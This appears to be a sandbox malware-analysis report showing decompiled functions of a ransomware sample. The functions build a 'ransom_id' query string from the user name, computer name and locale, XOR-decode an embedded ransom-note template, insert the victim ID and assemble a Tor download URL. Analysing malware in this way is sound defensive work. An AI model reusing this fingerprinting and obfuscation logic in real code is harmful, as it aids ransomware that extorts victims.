Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: 54d8ad1b625e0279a2f9d2f1681e62a3c1e04934d8df948a1a6a8639dc21a1ec
Instruction ID: 072b8eda667c6601cfeac08f9b7e68b7734f704527476299d01be323d6aaec82
Opcode Fuzzy Hash: 54d8ad1b625e0279a2f9d2f1681e62a3c1e04934d8df948a1a6a8639dc21a1ec
Instruction Fuzzy Hash: 7541A8B4811358DEEB25CF9199987DEBFF5BB04748F50819ED5086B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E70A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F4E70A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

0x0f4e70a4
0x0f4e70a7
0x0f4e70b8
0x0f4e70c1
0x0f4e70c9
0x0f4e70d2
0x0f4e70da
0x0f4e70da
0x0f4e70df
0x0f4e70e5
0x0f4e70ed
0x0f4e70f3
0x0f4e70fb
0x0f4e70fb
0x0f4e7101
0x0f4e7107
0x0f4e710f
0x0f4e7115
0x0f4e711d
0x0f4e711d
0x0f4e7123
0x0f4e7129
0x0f4e7131
0x0f4e7137
0x0f4e713f
0x0f4e713f
0x0f4e7145
0x0f4e714b
0x0f4e7153
0x0f4e7159
0x0f4e7161
0x0f4e7161
0x0f4e7167
0x0f4e716d
0x0f4e7175
0x0f4e717b
0x0f4e7183
0x0f4e7183
0x0f4e7189
0x0f4e718f
0x0f4e7197
0x0f4e719d
0x0f4e71a5
0x0f4e71a5
0x0f4e71ab
0x0f4e71b1
0x0f4e71b9
0x0f4e71bf
0x0f4e71c7
0x0f4e71c7
0x0f4e71cd
0x0f4e71d3
0x0f4e71db
0x0f4e71e1
0x0f4e71e9
0x0f4e71e9
0x0f4e71ef
0x0f4e71fc
0x0f4e7202
0x0f4e7205
0x0f4e720a
0x0f4e7227
0x0f4e720c
0x0f4e7216
0x0f4e721c
0x0f4e7234
0x0f4e723c
0x0f4e7242
0x0f4e724a
0x0f4e7256
0x0f4e7256
0x0f4e7260
0x0f4e7266
0x0f4e726e
0x0f4e7274
0x0f4e727c
0x0f4e727c
0x0f4e7288
0x0f4e7292

APIs

lstrcatW.KERNEL32(?,?), ref: 0F4E70C1
lstrcatW.KERNEL32(?,0F4EFFD0), ref: 0F4E70C9
lstrcatW.KERNEL32(?,?), ref: 0F4E70D2
lstrcatW.KERNEL32(?,0F4EFFD4), ref: 0F4E70DA
lstrcatW.KERNEL32(?,?), ref: 0F4E70E5
lstrcatW.KERNEL32(?,0F4EFFD0), ref: 0F4E70ED
lstrcatW.KERNEL32(?,?), ref: 0F4E70F3
lstrcatW.KERNEL32(?,0F4EFFD4), ref: 0F4E70FB
lstrcatW.KERNEL32(?,?), ref: 0F4E7107
lstrcatW.KERNEL32(?,0F4EFFD0), ref: 0F4E710F
lstrcatW.KERNEL32(?,?), ref: 0F4E7115
lstrcatW.KERNEL32(?,0F4EFFD4), ref: 0F4E711D
lstrcatW.KERNEL32(?,?), ref: 0F4E7129
lstrcatW.KERNEL32(?,0F4EFFD0), ref: 0F4E7131
lstrcatW.KERNEL32(?,?), ref: 0F4E7137
lstrcatW.KERNEL32(?,0F4EFFD4), ref: 0F4E713F
lstrcatW.KERNEL32(?,?), ref: 0F4E714B
lstrcatW.KERNEL32(?,0F4EFFD0), ref: 0F4E7153
lstrcatW.KERNEL32(?,?), ref: 0F4E7159
lstrcatW.KERNEL32(?,0F4EFFD4), ref: 0F4E7161
lstrcatW.KERNEL32(?,?), ref: 0F4E716D
lstrcatW.KERNEL32(?,0F4EFFD0), ref: 0F4E7175
lstrcatW.KERNEL32(?,?), ref: 0F4E717B
lstrcatW.KERNEL32(?,0F4EFFD4), ref: 0F4E7183
lstrcatW.KERNEL32(?,0F4E4B36), ref: 0F4E718F
lstrcatW.KERNEL32(?,0F4EFFD0), ref: 0F4E7197
lstrcatW.KERNEL32(?,?), ref: 0F4E719D
lstrcatW.KERNEL32(?,0F4EFFD4), ref: 0F4E71A5
lstrcatW.KERNEL32(?,?), ref: 0F4E71B1
lstrcatW.KERNEL32(?,0F4EFFD0), ref: 0F4E71B9
lstrcatW.KERNEL32(?,?), ref: 0F4E71BF
lstrcatW.KERNEL32(?,0F4EFFD4), ref: 0F4E71C7
lstrcatW.KERNEL32(?,?), ref: 0F4E71D3
lstrcatW.KERNEL32(?,0F4EFFD0), ref: 0F4E71DB
lstrcatW.KERNEL32(?,?), ref: 0F4E71E1
lstrcatW.KERNEL32(?,0F4EFFD4), ref: 0F4E71E9
VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0F4E4869,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0F4E71FC
wsprintfW.USER32 ref: 0F4E7216
wsprintfW.USER32 ref: 0F4E7227
lstrcatW.KERNEL32(?,?), ref: 0F4E7234
lstrcatW.KERNEL32(?,0F4EFFD0), ref: 0F4E723C
lstrcatW.KERNEL32(?,?), ref: 0F4E7242
lstrcatW.KERNEL32(?,0F4EFFD4), ref: 0F4E724A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F4E7256
lstrcatW.KERNEL32(?,?), ref: 0F4E7266
lstrcatW.KERNEL32(?,0F4EFFD0), ref: 0F4E726E
lstrcatW.KERNEL32(?,?), ref: 0F4E7274
lstrcatW.KERNEL32(?,0F4EFFD4), ref: 0F4E727C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,0F4E4869,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E727F

Strings

undefined, xrefs: 0F4E7221
%x%x, xrefs: 0F4E7210

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: 0fd08dd01ea63a34b2877fad2fcbf5cc61d688ce7527b3b2a3544da256358912
Instruction ID: f772af268d187bef72c2249dd902bbb572f9b756350bb17ab3867a20ca7a942d
Opcode Fuzzy Hash: 0fd08dd01ea63a34b2877fad2fcbf5cc61d688ce7527b3b2a3544da256358912
Instruction Fuzzy Hash: 3E516C30142668B6CB233F618C49FDF3E19EFC6722F124052FD101805B9B7A9256DFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E42B0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0F4E42B0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xf4f2a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0F4E3BC0( &_v148);
				E0F4E7490( &_v236, __edx); // executed
				_t97 = E0F4E72A0( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0F4E70A0( &_v152, _t98); // executed
				_t60 = E0F4E81F0(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xf4f0510]");
				_t77 = 0xf4f2000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xf4f2000) =  *(_t62 + 0xf4f2000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xf4f2a64 = 0xf4f2000;
				_t94 = E0F4E81F0(0xf4f2000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xf4f2a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
						 *0xf4f2a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000); // executed
					_t54 = E0F4E7D70( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xf4f2000;
					_t69 =  *0xf4f2000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xf4f2000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}

0x0f4e42c5
0x0f4e4598
0x0f4e459d
0x0f4e459d
0x0f4e42cb
0x0f4e42cc
0x0f4e42ce
0x0f4e42cf
0x0f4e42d4
0x0f4e42d6
0x0f4e42d7
0x0f4e42d9
0x0f4e42da
0x0f4e42dc
0x0f4e42dd
0x0f4e42df
0x0f4e42e0
0x0f4e42e5
0x0f4e42e7
0x0f4e42e8
0x0f4e42f1
0x0f4e42fd
0x0f4e430e
0x0f4e4317
0x0f4e4321
0x0f4e4327
0x0f4e4330
0x0f4e4341
0x0f4e433d
0x0f4e433d
0x0f4e433d
0x0f4e434b
0x0f4e4357
0x0f4e4363
0x0f4e4369
0x0f4e4371
0x0f4e4376
0x0f4e437b
0x0f4e437e
0x0f4e4383
0x0f4e4390
0x0f4e4390
0x0f4e4390
0x0f4e4393
0x0f4e4398
0x0f4e439c
0x0f4e43a1
0x0f4e43a1
0x0f4e43b0
0x0f4e43b0
0x0f4e43b7
0x0f4e43b8
0x0f4e43c4
0x0f4e43d8
0x0f4e43dc
0x0f4e4456
0x0f4e445d
0x0f4e4465
0x0f4e446d
0x0f4e4475
0x0f4e447d
0x0f4e4485
0x0f4e448d
0x0f4e4495
0x0f4e449d
0x0f4e44a5
0x0f4e44ad
0x0f4e44b5
0x0f4e44bd
0x0f4e44c5
0x0f4e44cd
0x0f4e44d5
0x0f4e44dd
0x0f4e44e5
0x0f4e44ed
0x0f4e44f5
0x0f4e44fd
0x0f4e4505
0x0f4e450d
0x0f4e4515
0x0f4e451d
0x0f4e4525
0x0f4e452d
0x0f4e4535
0x0f4e453d
0x0f4e4545
0x0f4e4555
0x0f4e455b
0x0f4e4562
0x0f4e456f
0x0f4e4575
0x0f4e4562
0x0f4e4586
0x0f4e4593
0x00000000
0x0f4e4593
0x0f4e43e0
0x0f4e43e0
0x0f4e43e2
0x0f4e43f4
0x0f4e43f8
0x0f4e43fd
0x0f4e4406
0x00000000
0x00000000
0x0f4e440a
0x0f4e440d
0x0f4e4413
0x0f4e4413
0x0f4e441b
0x00000000
0x00000000
0x0f4e4420
0x0f4e4420
0x0f4e4426
0x00000000
0x00000000
0x0f4e4430
0x0f4e4432
0x0f4e443d
0x0f4e4441
0x00000000
0x00000000
0x00000000
0x0f4e4441
0x0f4e4434
0x0f4e443b
0x00000000
0x00000000
0x00000000
0x0f4e443b
0x0f4e459e
0x00000000
0x0f4e4447
0x0f4e4447
0x0f4e4447
0x0f4e444b
0x0f4e444e
0x0f4e4451
0x00000000
0x0f4e4413
0x00000000

APIs

Part of subcall function 0F4E3BC0: GetProcessHeap.KERNEL32(?,?,0F4E4807,00000000,?,00000000,00000000), ref: 0F4E3C5C

Part of subcall function 0F4E7490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F4E74B7
Part of subcall function 0F4E7490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F4E74C8
Part of subcall function 0F4E7490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F4E74E6
Part of subcall function 0F4E7490: GetComputerNameW.KERNEL32 ref: 0F4E74F0
Part of subcall function 0F4E7490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F4E7510
Part of subcall function 0F4E7490: wsprintfW.USER32 ref: 0F4E7551
Part of subcall function 0F4E7490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F4E756E
Part of subcall function 0F4E7490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F4E7592
Part of subcall function 0F4E7490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F4E4810,?), ref: 0F4E75B6
Part of subcall function 0F4E7490: RegCloseKey.KERNEL32(00000000), ref: 0F4E75D2

Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E72F2
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E72FD
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7313
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E731E
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7334
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E733F
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7355
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(0F4E4B36,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7360
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7376
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7381
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7397
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73A2
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73C1
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73CC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E4321
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E4363
lstrcpyW.KERNEL32 ref: 0F4E43E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E43E9

Strings

h, xrefs: 0F4E4525
n, xrefs: 0F4E453D
r, xrefs: 0F4E449D
., xrefs: 0F4E44B5
t, xrefs: 0F4E4465
j, xrefs: 0F4E44A5
l, xrefs: 0F4E44FD
h, xrefs: 0F4E445D
n, xrefs: 0F4E44D5
., xrefs: 0F4E4535
o, xrefs: 0F4E44DD
m, xrefs: 0F4E452D
/, xrefs: 0F4E4475
w, xrefs: 0F4E44F5
s, xrefs: 0F4E446D
d, xrefs: 0F4E44E5
r, xrefs: 0F4E4495
{USERID}, xrefs: 0F4E43BF, 0F4E440D, 0F4E4413
-, xrefs: 0F4E450D
r, xrefs: 0F4E44BD
c, xrefs: 0F4E44AD
ransom_id=, xrefs: 0F4E4350, 0F4E435C
a, xrefs: 0F4E4505
t, xrefs: 0F4E448D
o, xrefs: 0F4E44CD
y, xrefs: 0F4E451D
/, xrefs: 0F4E44C5
d, xrefs: 0F4E44ED
w, xrefs: 0F4E4485
a, xrefs: 0F4E4515
w, xrefs: 0F4E447D

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
API String ID: 4100118565-2385900546
Opcode ID: 1651ce77240b966ab4475b79849cc988be61492376b0288759a03813847e111f
Instruction ID: ac60f89046ad7bef41306a7c43b44be7ba421404bfcea359537dc18cd6812135
Opcode Fuzzy Hash: 1651ce77240b966ab4475b79849cc988be61492376b0288759a03813847e111f
Instruction Fuzzy Hash: 1471D1705043409BE720DF10D80976BBFE1FB8075AF50491DEE895B2A2EBF9964CCB96

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E43A6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F4E43A6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xf4f2000) =  *(_t41 + 0xf4f2000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xf4f2a64 = 0xf4f2000;
				_t60 = E0F4E81F0(0xf4f2000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xf4f2000;
						_t49 =  *0xf4f2000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xf4f2000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xf4f2a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
					 *0xf4f2a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000); // executed
				_t44 = E0F4E7D70( &_a136);
				return _t44;
			}

0x0f4e43a6
0x0f4e43b0
0x0f4e43b0
0x0f4e43b7
0x0f4e43b8
0x0f4e43c4
0x0f4e43d8
0x0f4e43dc
0x0f4e43e0
0x0f4e43e0
0x0f4e43e2
0x0f4e43f4
0x0f4e43f8
0x0f4e43fd
0x0f4e4406
0x00000000
0x00000000
0x0f4e440a
0x0f4e440d
0x0f4e4413
0x0f4e4413
0x0f4e441b
0x00000000
0x0f4e4420
0x0f4e4420
0x0f4e4420
0x0f4e4426
0x00000000
0x00000000
0x0f4e4430
0x0f4e4432
0x0f4e443d
0x0f4e4441
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e4434
0x0f4e4434
0x0f4e443b
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e443b
0x00000000
0x0f4e4432
0x0f4e459e
0x00000000
0x0f4e459e
0x00000000
0x0f4e4447
0x0f4e4447
0x0f4e4447
0x0f4e444b
0x0f4e444e
0x0f4e4451
0x00000000
0x0f4e4413
0x0f4e43e0
0x0f4e4456
0x0f4e445d
0x0f4e4465
0x0f4e446d
0x0f4e4475
0x0f4e447d
0x0f4e4485
0x0f4e448d
0x0f4e4495
0x0f4e449d
0x0f4e44a5
0x0f4e44ad
0x0f4e44b5
0x0f4e44bd
0x0f4e44c5
0x0f4e44cd
0x0f4e44d5
0x0f4e44dd
0x0f4e44e5
0x0f4e44ed
0x0f4e44f5
